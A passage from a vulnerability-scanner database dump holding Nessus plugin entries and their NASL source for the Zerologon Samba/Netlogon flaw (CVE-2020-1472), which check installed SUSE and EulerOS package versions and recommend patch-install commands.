reference:\"samba-ceph-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ceph-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-debuginfo / ctdb-pcp-pmda / ctdb-pcp-pmda-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:25:19", "description": "According to the version of the samba packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-30T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : samba (EulerOS-SA-2020-2299)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libsmbclient", "p-cpe:/a:huawei:euleros:libwbclient", "p-cpe:/a:huawei:euleros:samba", "p-cpe:/a:huawei:euleros:samba-client", "p-cpe:/a:huawei:euleros:samba-client-libs", "p-cpe:/a:huawei:euleros:samba-common", "p-cpe:/a:huawei:euleros:samba-common-libs", "p-cpe:/a:huawei:euleros:samba-common-tools", "p-cpe:/a:huawei:euleros:samba-libs", "p-cpe:/a:huawei:euleros:samba-python", "p-cpe:/a:huawei:euleros:samba-winbind", "p-cpe:/a:huawei:euleros:samba-winbind-clients", "p-cpe:/a:huawei:euleros:samba-winbind-modules", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2299.NASL", "href": "https://www.tenable.com/plugins/nessus/142110", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142110);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"EulerOS 2.0 SP5 : samba (EulerOS-SA-2020-2299)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the samba packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2299\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cb63ee7d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libsmbclient-4.7.1-9.h21.eulerosv2r7\",\n \"libwbclient-4.7.1-9.h21.eulerosv2r7\",\n \"samba-4.7.1-9.h21.eulerosv2r7\",\n \"samba-client-4.7.1-9.h21.eulerosv2r7\",\n \"samba-client-libs-4.7.1-9.h21.eulerosv2r7\",\n \"samba-common-4.7.1-9.h21.eulerosv2r7\",\n \"samba-common-libs-4.7.1-9.h21.eulerosv2r7\",\n \"samba-common-tools-4.7.1-9.h21.eulerosv2r7\",\n \"samba-libs-4.7.1-9.h21.eulerosv2r7\",\n \"samba-python-4.7.1-9.h21.eulerosv2r7\",\n \"samba-winbind-4.7.1-9.h21.eulerosv2r7\",\n \"samba-winbind-clients-4.7.1-9.h21.eulerosv2r7\",\n \"samba-winbind-modules-4.7.1-9.h21.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-19T15:32:02", "description": "The Netlogon service on the remote host is vulnerable to the zerologon vulnerability. An unauthenticated, remote attacker can exploit this, by spoofing a client credential to establish a secure channel to a domain controller using the Netlogon remote protocol (MS-NRPC). The attacker can then use this to change the computer's Active Directory (AD) password, and escalate privileges to domain admin.\n\nIn order for this plugin to run, you must disable 'Only use credentials provided by the user' in the scanner settings.", "cvss3": {}, "published": "2020-09-18T00:00:00", "type": "nessus", "title": "Microsoft Netlogon Elevation of Privilege (Zerologon) (Remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "href": "https://www.tenable.com/plugins/nessus/140657", "sourceData": "Binary data netlogon_zerologon_CVE-2020-1472.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:37", "description": "This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nFixed an issue where multiple home folders were created(bsc#1174316, bso#13369).\n\nFixed an issue where the net command was unable to negotiate SMB2 (bsc#1174120);\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : samba (SUSE-SU-2020:2721-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap0", "p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-2721-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143864", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2721-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143864);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLES12 Security Update : samba (SUSE-SU-2020:2721-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some\nconfigurations when an attacker established a vulnerable Netlogon\nsecure channel connection to a domain controller, using the Netlogon\nRemote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nFixed an issue where multiple home folders were created(bsc#1174316,\nbso#13369).\n\nFixed an issue where the net command was unable to negotiate SMB2\n(bsc#1174120);\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1174120\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1174316\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202721-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c4b90b2\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2020-2721=1\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2020-2721=1\n\nSUSE OpenStack Cloud 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-9-2020-2721=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2020-2721=1\n\nSUSE Linux Enterprise Server for SAP 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP4-2020-2721=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2020-2721=1\n\nSUSE Linux Enterprise Server 12-SP4-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2020-2721=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2020-2721=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2020-2721=1\n\nSUSE Linux Enterprise High Availability 12-SP4 :\n\nzypper in -t patch SUSE-SLE-HA-12-SP4-2020-2721=1\n\nSUSE Linux Enterprise High Availability 12-SP3 :\n\nzypper in -t patch SUSE-SLE-HA-12-SP3-2020-2721=1\n\nSUSE Enterprise Storage 5 :\n\nzypper in -t patch SUSE-Storage-5-2020-2721=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2020-2721=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc-binding0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc-binding0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc-binding0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-krb5pac0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-krb5pac0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", 